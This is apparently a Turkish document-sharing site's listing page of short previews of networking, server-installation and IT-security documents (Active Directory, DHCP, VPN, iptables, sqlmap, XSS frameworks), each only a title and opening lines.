Windows Server 2012 Active Directory Kurulumu Windows Server 2012 Active Directory Kurulumu Active Directory(A.D): Merkezi yönetim yapmamızı sağlayan servisin adı. Windows 2000 Server ile gelen özelliklerin basında "Active Directory" gelir. Active

Detaylı

AntiKor Güvenlik Sunucumu nereye yerleştirmeliyim?

AntiKor Güvenlik Sunucumu nereye yerleştirmeliyim? AntiKor Güvenlik Sunucumu nereye yerleştirmeliyim? AntiKor Güvenlik sunucusu, yerel ağ ile interneti sağlayan DSL modem veya Router arasına girerek bütün İnternet trafiğinin üzerinden geçmesini sağlar

Detaylı

KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB İÇİNDEKİLER

KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB İÇİNDEKİLER KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB Tarih: 29/01/2013 Versiyon Tarih Açıklama 1.0 29-01-13 İlk yazımı İÇİNDEKİLER 1. AMAÇ... 1-2 2. SSLVPN BAĞLANTI ADIMLARI... 2-2 2.1 Linux

Detaylı

Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü. Bilgisayar Ağları Dersi Lab. 2

Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü. Bilgisayar Ağları Dersi Lab. 2 Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü Bilgisayar Ağları Dersi Lab. 2 İçerik IP ICMP MAC Tracert IP Protokolü Ağ katmanı paketlerin kaynaktan hedefe ulaşmasından sorumludur.

Detaylı

Kamuda Çalışanların Sosyal

Kamuda Çalışanların Sosyal Kamuda Çalışanların Sosyal Medya Kullanımı İle Oluşabilecek Güvenlik Riskleri Sosyal ağlardaki saldırılar, ağın teknik altyapısından veya işleyiş sistemindeki zaaflardan kaynaklanır. Klasik siber saldırıların

Detaylı

UBNT. UniFi mfi Ububntu. Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu

UBNT. UniFi mfi Ububntu. Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu UBNT UniFi mfi Ububntu Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu İlknur Duran - Net Vizyon Bilgi İşlem A.Ş. Ubiquiti Networks (UBNT) UniFi ve mfi ürün ailesinin kurulumu, konfigurasyonu

Detaylı

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları 1. MAC adresleri kaç byte dır? 2. Aşağıdaki MAC adresi hangi firmaya aittir. 00:03:6C:1c:2c:3d 3. TCP SYN paketi kaç byte dır? 4. 100

Detaylı

Kabuk Programlama (Bash)

Kabuk Programlama (Bash) Kabuk Programlama (Bash) Erkan Esmer Ocak, 2013 İçindekiler 1 Giriş.................................................... 2 2 Kabuk(Shell)............................................... 3 3 Çekirdek(Kernel).............................................

Detaylı

Windows Server 2012 DHCP Kurulum ve Yapılandırma

Windows Server 2012 DHCP Kurulum ve Yapılandırma Windows Server 2012 DHCP Kurulum ve Yapılandırma DHCP, TCP/IP ağındaki makinelere IP adresi, DNS, Wins vb. ayarların otomatik olarak yapılması için kullanılır. Bu özellik ADSL modemlerin içerisinde de

Detaylı

FTP ve Güvenlik Duvarları

FTP ve Güvenlik Duvarları FTP ve Güvenlik Duvarları FTP Protokolü FTP, sık kullanılan protokoller(http, SMTP, DNS vs) arasında en sorunlu protokoldür. Diğer protokoller tek bir TCP/UDP portu üzerinden çalışırken FTP birden fazla

Detaylı

BIND ile DNS Sunucu Kurulumu

BIND ile DNS Sunucu Kurulumu BIND ile DNS Sunucu Kurulumu BIND Nedir? BIND bir dns sunucusu yani unix ve linux sistemler üzerinde dns servis hizmetini veren başarılı bir daemondur. Kısacası en popüler DNS sunucu yazılımı BIND dir.

Detaylı

"Kendi Bağlantım" İle Kendi VPN Sunucunuzu Kurun

Kendi Bağlantım İle Kendi VPN Sunucunuzu Kurun "Kendi Bağlantım" İle Kendi VPN Sunucunuzu Kurun Bildiğiniz üzere Wikipedia gibi faydalı birçok siteye erişim engelli. Bunun gibi ülkemizde engellenmiş sitelere erişebilmek için birden fazla yöntem mevcut.

Detaylı

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir?

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir? JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 1.1- JasperReports Server ve Ireport Nedir? 1.2- JasperReports Server ve Ireport Kurulumu 1.3- JasperReports Server Genel

Detaylı

BLGM 354 DENEY 1 * GİRİŞ

BLGM 354 DENEY 1 * GİRİŞ BLGM 354 DENEY 1 * GİRİŞ Amaçlar 1. Oracle istemcisi kurulumu 2. Veritabanı bağlantısı 3. SQL geliştirme ortamında çalışma Oracle İstemcisinin Kurulumu Oracle istemcisi bölümün FTP sunucusundan (ftp://ftp.cmpe.emu.edu.tr)

Detaylı

Clonezilla Server ile Ağ Üzerinden Çoklu İmaj Yükleme

Clonezilla Server ile Ağ Üzerinden Çoklu İmaj Yükleme Clonezilla Server ile aynı ağ üzerinde bulunan birden fazla istemciye aynı anda imaj yükleyebilirsiniz. Bunun için gerekli tüm bileşenleri içerisinde barındıran DRBL (Diskless Remote Boot in Linux) sunucusunu

Detaylı

MCR02-AE Ethernet Temassız Kart Okuyucu

MCR02-AE Ethernet Temassız Kart Okuyucu MCR02-AE Ethernet Temassız Kart Okuyucu Teknik Özellikleri Ethernet 10BaseT Dahili TCP/IP Stack TCP/IP Client-Server Bağlantı Özelliği Dahili DNS İstemcisi DHCP veya Statik IP ile çalışabilme UDP, TCP,ARP,ICMP(ping)

Detaylı

Açık Kod VPN Çözümleri: OpenVPN. Huzeyfe ÖNAL huzeyfe@enderunix.org

Açık Kod VPN Çözümleri: OpenVPN. Huzeyfe ÖNAL huzeyfe@enderunix.org Açık Kod VPN Çözümleri: OpenVPN Huzeyfe ÖNAL huzeyfe@enderunix.org EnderUNIX Yazılım m Geliştirme Ekibi Sunum Planı VPN Tanımı VPN Çeşitleri VPN terimleri VPN Teknolojileri AçıkKod VPN Projeleri OpenSSH

Detaylı

Ağ Nedir? Birden fazla bilgisayarın iletişimini sağlayan printer vb. kaynakları, daha iyi ve ortaklaşa kullanımı sağlayan yapılara denir.

Ağ Nedir? Birden fazla bilgisayarın iletişimini sağlayan printer vb. kaynakları, daha iyi ve ortaklaşa kullanımı sağlayan yapılara denir. TEMEL AĞ TANIMLARI Ağ Nedir? Birden fazla bilgisayarın iletişimini sağlayan printer vb kaynakları, daha iyi ve ortaklaşa kullanımı sağlayan yapılara denir WAN ve LAN Kavramları Bilgisayarlar ve paylaşılan

Detaylı

EC-485. Ethernet RS485 Çevirici. İstanbul Yazılım ve Elektronik Teknolojileri

EC-485. Ethernet RS485 Çevirici. İstanbul Yazılım ve Elektronik Teknolojileri EC-485 Ethernet RS485 Çevirici İstanbul Yazılım ve Elektronik Teknolojileri TR+: RS485 TR+ bağlantısı için kullanılır. TR-: RS485 TR- bağlantısı için kullanılır. EC-485, cihazlarınıza veya bilgisayara

Detaylı

WINDOWS SERVER 2008 R2-SERVER 2012 DE IP SANALLAŞTIRMA

WINDOWS SERVER 2008 R2-SERVER 2012 DE IP SANALLAŞTIRMA WINDOWS SERVER 2008 R2-SERVER 2012 DE IP SANALLAŞTIRMA IP Sanallaştırma Nedir? Windows Server işletim sistemlerinde Remote Desktop Host Services (önceki ismi Terminal Services) teknolojisini kullanarak

Detaylı

WiFi RS232 Converter Sayfa 1 / 12. WiFi RS232 Converter. Teknik Döküman

WiFi RS232 Converter Sayfa 1 / 12. WiFi RS232 Converter. Teknik Döküman WiFi RS232 Converter Sayfa 1 / 12 WiFi RS232 Converter Teknik Döküman WiFi RS232 Converter Sayfa 2 / 12 1. ÖZELLĐKLER 60.20mm x 40.0mm devre boyutları (5-15)VDC giriş gerilimi Giriş ve çalışma gerilimini

Detaylı

Computer Networks 5. Öğr. Gör. Yeşim AKTAŞ Bilgisayar Mühendisliği A.B.D.

Computer Networks 5. Öğr. Gör. Yeşim AKTAŞ Bilgisayar Mühendisliği A.B.D. Computer Networks 5 Öğr. Gör. Yeşim AKTAŞ Bilgisayar Mühendisliği A.B.D. TCP/IP Modeli TCP/IP, günümüzde en yaygın olarak kullanılan protokol takımıdır ve TCP/IP protokol yığınına (TCP/IP stack) gömülü,

Detaylı

Güvenlik Araçları. Savunmadan çok saldırı ya yönelik araçlar. Amaç, saldırganlardan önce sistemdeki açıkları ortaya çıkarıp gereken önlemleri almak.

Güvenlik Araçları. Savunmadan çok saldırı ya yönelik araçlar. Amaç, saldırganlardan önce sistemdeki açıkları ortaya çıkarıp gereken önlemleri almak. Güvenlik Araçları Savunmadan çok saldırı ya yönelik araçlar. Amaç, saldırganlardan önce sistemdeki açıkları ortaya çıkarıp gereken önlemleri almak. 1/ 26 Nmap Network Mapper Ağ araştırması ve güvenlik

Detaylı

Kurulumdan sonra direk sunucunuzun ip adresini web tarayıcınıza girerseniz apachenin çalıştığına dair "It works" mesajını görebilirsiniz.

Kurulumdan sonra direk sunucunuzun ip adresini web tarayıcınıza girerseniz apachenin çalıştığına dair It works mesajını görebilirsiniz. Webmin Kurulumu Webmin, Unix benzeri sistemler için web tabanlı sistem yapılandırma aracıdır. Debian üzerine webmin kurulumu yapacağız. Webmin UNIX/Linux sistem yöneticileri için hazırlanmış bir web yönetim

Detaylı

www.airties.com 7/24 destek hattı 444 0 239 Kolay kurulum CD si Üç yıl garanti Üç yıl garanti YM.WR.5341.UM.TR.D01REV07062011

www.airties.com 7/24 destek hattı 444 0 239 Kolay kurulum CD si Üç yıl garanti Üç yıl garanti YM.WR.5341.UM.TR.D01REV07062011 www.airties.com Kolay kurulum CD si Üç yıl garanti 7/24 destek hattı 444 0 239 7/24 destek hattı 444 0 239 Üç yıl garanti YM.WR.5341.UM.TR.D01REV07062011 Kablosuz yaşam Hızlı kurulum kılavuzu Kablosuz

Detaylı

e-imzatr Kurulum Klavuzu

e-imzatr Kurulum Klavuzu e-imzatr Kurulum Klavuzu Sürüm 0.0.1 1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kart Okuyucu Sürücü Kurulum Kullanıcı Doğrulama 2 İşletim Sistemi Sistem Türü Öğrenme Bu

Detaylı

Smoothwall URL Filter Kurulumu

Smoothwall URL Filter Kurulumu Smoothwall URL Filter Kurulumu Dosya, Kelime, Site, Url, İp bazlı erişim ve yasaklama işlemleri Merhaba bu yazımızda Smoothwall da URL Filter servisini ekleme ve özelliklerinden bahsedeceğiz. URL Filter

Detaylı

Kolay Kurulum Kılavuzu

Kolay Kurulum Kılavuzu Kolay Kurulum Kılavuzu Robustel R3000 Serisi Endüstriyel 3G / 4G VPN Router 4 e Kadar Ethernet, 2 ye Kadar Seri Port İçindekiler Sayfa 3 R3000 Serisi Alt Modelleri Başlık 5 R3000 Serisi: Dış Görünüş 6

Detaylı

e-imzatr Kurulum Klavuzu

e-imzatr Kurulum Klavuzu e-imzatr Kurulum Klavuzu Sürüm 0.0.1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kullanıcı Doğrulama İşletim Sistemi Sistem Türü Öğrenme Bu başlıkta bilgisayarımızın mevcut

Detaylı

EC-100. Ethernet RS232/422/485 Çevirici. İstanbul Yazılım ve Elektronik Teknolojileri

EC-100. Ethernet RS232/422/485 Çevirici. İstanbul Yazılım ve Elektronik Teknolojileri EC-100 Ethernet RS232/422/485 Çevirici İstanbul Yazılım ve Elektronik Teknolojileri EC-100, cihazlarınıza veya bilgisayara RS232/422/485 hattından bağlayarak kullanabileceğiniz tak-kullan şeklinde tasarlanmış

Detaylı

Örnek bir kullanım ve bilgisayar ağlarını oluşturan bileşenlerin özeti

Örnek bir kullanım ve bilgisayar ağlarını oluşturan bileşenlerin özeti Bu sayfaları okuduğunuza göre bir şekilde bilgisayarlar ve bilgisayar ağlarıyla ilişkiniz olduğunu biliyorum. Ancak yine de en başta niçin bilgisayar ağı kullanıyoruz sorusunun cevabını vermekle işe başlayabiliriz.

Detaylı

Virtual Router Redundancy Protocol (VRRP)

Virtual Router Redundancy Protocol (VRRP) Virtual Router Redundancy Protocol (VRRP) VRRP teknolojisi IEEE temel alınarak geliştirilmiştir.[13] VRRP, HSRP gibi teknolojilerde olduğu gibi birden fazla yönlendiricinin veya üçüncü seviye bir anahtarlayıcının

Detaylı

Yrd. Doç. Dr. A. Burak İNNER

Yrd. Doç. Dr. A. Burak İNNER Yrd. Doç. Dr. A. Burak İNNER Kocaeli Üniversitesi Bilgisayar Mühendisliği Yapay Zeka ve Benzetim Sistemleri Ar-Ge Lab. http://yapbenzet.kocaeli.edu.tr $ ping Bu komut uzak makineye

Detaylı

Vitel. Manage Engine. Opmanager Yönetici Özeti

Vitel. Manage Engine. Opmanager Yönetici Özeti Vitel Manage Engine Opmanager Yönetici Özeti AĞ ve SUNUCU İZLEME YAZILIMI OpManager web-tabanlı, ağ ve sunucu sistemlerini, (routers,firewalls,servers,switches,printers) merkezi bir noktadan izleme ve

Detaylı

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı Tarih 1 İçerik TCP/IP Temelleri Ağı Dinleme MAC Adres Tablosu Doldurma ARP Zehirlemesi

Detaylı

Hot Standby Router Protocol (HSRP)

Hot Standby Router Protocol (HSRP) Hot Standby Router Protocol (HSRP) HSRP, birden fazla yönlendiricinin veya üçüncü seviye bir anahtarlayıcının son kullanıcıya tek yönlendirici olarak görünmesini sağlayan protokoldür. Birden fazla yönlendirici

Detaylı

Giriş. İş Ortamlarına Yerleşimi. SecurityOnion Nedir? SecurityOnion İndirme Adresi. SecurityOnion Kurulumu. Kurulum Sonrası Yapılandırma

Giriş. İş Ortamlarına Yerleşimi. SecurityOnion Nedir? SecurityOnion İndirme Adresi. SecurityOnion Kurulumu. Kurulum Sonrası Yapılandırma Giriş İş Ortamlarına Yerleşimi SecurityOnion Nedir? SecurityOnion İndirme Adresi SecurityOnion Kurulumu Kurulum Sonrası Yapılandırma Saldırı Tespit Sisteminin ( Snort ) Güncelleme Saldırı Tespit Sisteminin

Detaylı

Bilgi ve İletişim Teknolojileri (JFM 102) Ders 7. LINUX OS (Sistem Yapısı) BİLGİ & İLETİŞİM TEKNOLOJİLERİ. LINUX Yapısı

Bilgi ve İletişim Teknolojileri (JFM 102) Ders 7. LINUX OS (Sistem Yapısı) BİLGİ & İLETİŞİM TEKNOLOJİLERİ. LINUX Yapısı Ders 7 LINUX OS (Sistem Yapısı) BİLGİ & İLETİŞİM TEKNOLOJİLERİ 1 LINUX Yapısı LINUX işletim sisteminin diğer işletim sistemleri gibi kendine özgü bir yapısı vardır. LINUX yapısı ve bileşenleri aşağıdaki

Detaylı

Ev Kullanıcıları İçin KVM

Ev Kullanıcıları İçin KVM Ev Kullanıcıları İçin KVM Çağrı Emer Nisan, 2016 İçindekiler 1 Giriş................................................ 2 2 Peki KVM hangi konuk işletim sistemlerini çalıştırabiliyor?................... 3

Detaylı

e-imzatr Kurulum Klavuzu

e-imzatr Kurulum Klavuzu e-imzatr Kurulum Klavuzu Sürüm 0.0.1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kullanıcı Doğrulama İşletim Sistemi Sistem Türü Öğrenme Bu başlıkta bilgisayarımızın mevcut

Detaylı

Ağ Projektörü Çalıştırma Kılavuzu

Ağ Projektörü Çalıştırma Kılavuzu Ağ Projektörü Çalıştırma Kılavuzu İçindekiler Hazırlık...3 Projektörü bilgisayarınıza bağlama...3 Kablolu bağlantı... 3 Projektörün uzaktan bir web tarayıcısı vasıtasıyla kontrol edilmesi...5 Desteklenen

Detaylı

İÇERİK YÖNETİM SİSTEMİ (CMS) Bir web sitesi yayınlamak için yapılması gerekenler:

İÇERİK YÖNETİM SİSTEMİ (CMS) Bir web sitesi yayınlamak için yapılması gerekenler: İÇERİK YÖNETİM SİSTEMİ (CMS) Bir web sitesi yayınlamak için yapılması gerekenler: Yer satın alınır. İsim tescil ettirilir. Ftp ile wordpress klasörü upload edilir. Kendi bilgisayarımızda web sitesi yayınlamak

Detaylı

Ubuntu Terminal Server Ve Uzak Masaüstü Sunucusu

Ubuntu Terminal Server Ve Uzak Masaüstü Sunucusu Ubuntu Terminal Server Ve Uzak Masaüstü Sunucusu Ünal YILMAZ unalyilmaz@hotmail.com Hakkımda 1976 da İstanbul da doğdum. Haydarpaşa Endüstri Meslek Lisesi Elektrik, Anadolu Üni. Önlisans Halkla ilişkiler,

Detaylı

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ KOKLAYICILAR: Sniffing Nedir? Sniffing türkçe anlamı ile koklama bilgi güvenliğinde giden gelen veriyi araya girerek ele geçirmektir.sniffing'in

Detaylı

Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe

Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe 1. Giriş Turquaz programını windows üzerinde çalıştırmak için öncelikle bilgisayarınızda postgresql ve Java nın kurulu olması gerekli. Aşağıdaki bilgi ve dökümanlar windows 2000 işletim sistemi üzerinde

Detaylı

-D delete : Zinciri silmek için kullanılan komut; Silme işlemi için ya zincir numarası belirtilir ya da kuralın kendisi.

-D delete : Zinciri silmek için kullanılan komut; Silme işlemi için ya zincir numarası belirtilir ya da kuralın kendisi. Iptables Örnekleri Iptables kullanımı hakkında güzel örneklerin olduğu bir site Iptables komutunun kullanımda temel kavramlar şunlardır: INPUT bilgisayarımıza gelen paketler için uygulanacak kuralları

Detaylı

1. Bilgisayarınızda kullandığınız Web tarayıcı programını (Internet Explorer, Mozilla Firefox vb.) çalıştırınız.

1. Bilgisayarınızda kullandığınız Web tarayıcı programını (Internet Explorer, Mozilla Firefox vb.) çalıştırınız. VLAN Yapılandırma Değerli Müşterimiz, VLAN özelliği ile yerel ağınızı segmentlere ayırarak bölebilir ve aynı ağ geçidini kullanarak internete çıkabilen bu segmentlerin birbirlerine erişimlerini engelleyebilirsiniz.

Detaylı

SparkleShare. Çağrı Emer. Ekim, 2011

SparkleShare. Çağrı Emer. Ekim, 2011 SparkleShare Çağrı Emer Ekim, 2011 İçindekiler 1 Giriş.................................................... 2 2 GitHub ile Kurulum............................................ 5 3 Kendi Sunucumuza Kurulum.......................................

Detaylı

Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.

Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır. SqlMap Kullanımı Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır. Temel olarak yaptığı işlem sizin belirtmiş olduğunuz parametrelere göre hedef

Detaylı

Scream! e gelen veri akışlarından bazılarını diğer bir kurum yada bilgisayarla paylaşmak için kullanılabilir.

Scream! e gelen veri akışlarından bazılarını diğer bir kurum yada bilgisayarla paylaşmak için kullanılabilir. Eş zamanlı Scream! kullanımı Scream!, sismik ağın güçlü bir parçası olacak şekilde tasarlanmıştır. Varsayılan yapılandırma dosyası scream.ini dir ve ilk kullanım sırasında kendini otomatik olarak oluşturur.

Detaylı

Bilgi ve Olay Yönetim Sistemi

Bilgi ve Olay Yönetim Sistemi 1 Bilgi ve Olay Yönetim Sistemi Kurulum Kılavuzu Ağustos 2017 Versiyon Sürüm 2.2.5 2 İçindekiler Bilgi ve Olay Yönetim Sistemi... 1 1. Sistem Gereksinimleri... 3 2. Kurulum... 3 3. Lisanslama... 7 4. Windows

Detaylı

FOG SERVER (FREE GHOST SERVER) YAZILIMININ KURULUMU

FOG SERVER (FREE GHOST SERVER) YAZILIMININ KURULUMU FOG SERVER (FREE GHOST SERVER) YAZILIMININ KURULUMU 1. KURULUM ÖNCESİ HAZIRLIKLAR VE ORTAM / SÜRÜM ÖZELLİKLERİ: FOG Server yazılımı, Linux işletim sistemleri üzerine kurulan Apache2, PHP ve MySQL uygulamalarının

Detaylı

XSS Exploitation via CHEF

XSS Exploitation via CHEF XSS Exploitation via CHEF Evren Yalçın SignalSec Corp. www.signalsec.com GİRİŞ Xss zafiyetlerini exploit ederken genelde Beef(The Browser Exploitation Framework) aracı kullanılmaktadır. Fakat ek araçlar

Detaylı

Windows 7 - IIS 7.5 üzerine PHP ve MySQL kurulumu

Windows 7 - IIS 7.5 üzerine PHP ve MySQL kurulumu Windows 7 - IIS 7.5 üzerine PHP ve MySQL kurulumu Not: "Aşağıdaki anlatım Windows 7 64 bite göredir. 32 bit kullanıyorsanız MySQL 32 bit versiyonunu yükleyiniz." Windows 7 (64 bit işletim sistemi) ve IIS

Detaylı

Serdar SEVİL. TCP/IP Protokolü

Serdar SEVİL. TCP/IP Protokolü Serdar SEVİL TCP/IP Protokolü TCP/IP TCP/IP nin tarihi ARPANET ile başlayan Internetin tarihidir. Adreslerin dağıtımı NIC (Network Information Center) tarafından yapılır. Türkiye de ise bunu ODTÜ-TUBİTAK

Detaylı

Elbistan Meslek Yüksek Okulu Güz Yarıyılı

Elbistan Meslek Yüksek Okulu Güz Yarıyılı HAFTA VIII Elbistan Meslek Yüksek Okulu 2016 2017 Güz Yarıyılı DoD Referans Modeli - ARP ARP Address Resulation Protokol ARP Adres Çözümleme Protokolüdür. IP Adresi Donanım Adresi (MAC) DoD Referans Modeli

Detaylı

BİLGİSAYAR AĞLARI VE İLETİŞİM

BİLGİSAYAR AĞLARI VE İLETİŞİM BİLGİSAYAR AĞLARI VE İLETİŞİM 1. Giriş 2. OSI Başvuru Modeli ve Katmanları 1. Fiziksel Donanım Katmanı (1.Katman) 2. Veri Bağlantı Katmanı (2.Katman) 1.Mantıksal Bağ Kontrolü Ağ Katmanı 2.Ortama Erişim

Detaylı

Kampüs Ağlarında Köprü-Güvenlik Duvarı (Bridge Firewall) ve Transparent Proxy

Kampüs Ağlarında Köprü-Güvenlik Duvarı (Bridge Firewall) ve Transparent Proxy Kampüs Ağlarında Köprü-Güvenlik Duvarı (Bridge Firewall) ve Transparent Proxy Volkan Sönmez Süleyman Demirel Üniversitesi Bilgi İşlem Daire Başkanlığı 1. Giriş Bu bildiride kampüs ağlarında transparent

Detaylı

WDS İle Windows XP Pro Image Alma Ve Yükleme Ilbey Ismail UNVER - MCP

WDS İle Windows XP Pro Image Alma Ve Yükleme Ilbey Ismail UNVER - MCP 1 - WDS ÖN HAZIRLIK İŞLEMLERİ Windows Deployment Services ( WDS ) daha önceden oluşturduğumuz ya da varolan bir DVD içerisinden alabileceğimiz BOOT ve INSTALL dizinlerini sunucu üzerinden dağıtan ve bu

Detaylı

MaestroPanel Kurulum

MaestroPanel Kurulum MaestroPanel Kurulum 28.09.2011 Oğuzhan YILMAZ oguzhan@maestropanel.com Gereksinimler Windows Server 2008 R2 x64 Any Edition Web Platform Installer 3.0+ Desteklenen Yazılımlar MailEnable 5.x SQL Server

Detaylı

TÜRKİYE NOTERLER BİRLİĞİ

TÜRKİYE NOTERLER BİRLİĞİ Openvpn Kurulum Kılavuzu Değişiklik Numarası: 1.1 11/04/2013 1 / 8 İÇİNDEKİLER * 1 AMAÇ VE KAPSAM... 4 2 KURULUM ADIMLARI... 4 2.1 Türkiye Noterler Birliği Web Sayfasında Oturum Açma... 4 2.2 Vpn Kurulumu

Detaylı

Vpn nedir? VPN Nedir?

Vpn nedir? VPN Nedir? Vpn nedir? Özellikle twitter'ın da yasaklanmasıyla son günlerde internet kullanıcılarının büyük bir bölümünün yasaklara karşı kullanmak zorunda kaldığı "VPN nedir, nasıl çalışır, çeşitleri nelerdir, iyi

Detaylı

CHAPTER 9. DHCP Server

CHAPTER 9. DHCP Server 1 CHAPTER 9 DHCP Server 2 9.1 DHCP nedir? Bildiğiniz gibi bir ağda bulunan bilgisayarın birbirleri ile iletişim işinde bulunabilmeleri ve yine bu ağdaki internet bağlantısından faydalanabilmeleri için

Detaylı

Güvenlik Duvarı ve İçerik Filtreleme Sistemlerini Atlatma Yöntemleri. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ http://www.bga.com.tr honal@bga.com.

Güvenlik Duvarı ve İçerik Filtreleme Sistemlerini Atlatma Yöntemleri. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ http://www.bga.com.tr honal@bga.com. Güvenlik Duvarı ve İçerik Filtreleme Sistemlerini Atlatma Yöntemleri Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ http://www.bga.com.tr honal@bga.com.tr Amaç Kurumsal iş ortamlarında kullanılan güvenlik duvarı

Detaylı

İSTANBUL ÜNİVERSİTESİ MÜHENDİSLİK FAKÜLTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ SİSTEM PROGRAMLAMA DERSİ. Öğr.Gör. Mehmet DEMİR

İSTANBUL ÜNİVERSİTESİ MÜHENDİSLİK FAKÜLTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ SİSTEM PROGRAMLAMA DERSİ. Öğr.Gör. Mehmet DEMİR İSTANBUL ÜNİVERSİTESİ MÜHENDİSLİK FAKÜLTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ SİSTEM PROGRAMLAMA DERSİ Öğr.Gör. Mehmet DEMİR HOMEWORK 1: Linux Kurulumu(Sanal) ve Linux İşletim Sistemine Yeni Kernel Kurulumunun

Detaylı

VMware 4.0 vcenter Server Kurulumu

VMware 4.0 vcenter Server Kurulumu VMware 4.0 vcenter Server Kurulumu VMware ESX üzerinde sanal sunucu oluşturma makalemizde sizlere sanallaştırma teknolojilerinden birisi olan VMware ESX (vsphere) üzerinde sanal bir sunucunun nasıl oluşturulacağını

Detaylı

ÖNDER BİLGİSAYAR KURSU. Sistem ve Ağ Uzmanlığı Eğitimi İçeriği

ÖNDER BİLGİSAYAR KURSU. Sistem ve Ağ Uzmanlığı Eğitimi İçeriği ÖNDER BİLGİSAYAR KURSU Sistem ve Ağ Uzmanlığı Eğitimi İçeriği BÖLÜM 1 KİŞİSEL BİLGİSAYAR DONANIMI 1.1. Kişisel Bilgisayarlar ve Uygulamalar Bilgisayarların Kullanım Şekli ve Yeri Bilgisayar Tipleri (Sunucular,

Detaylı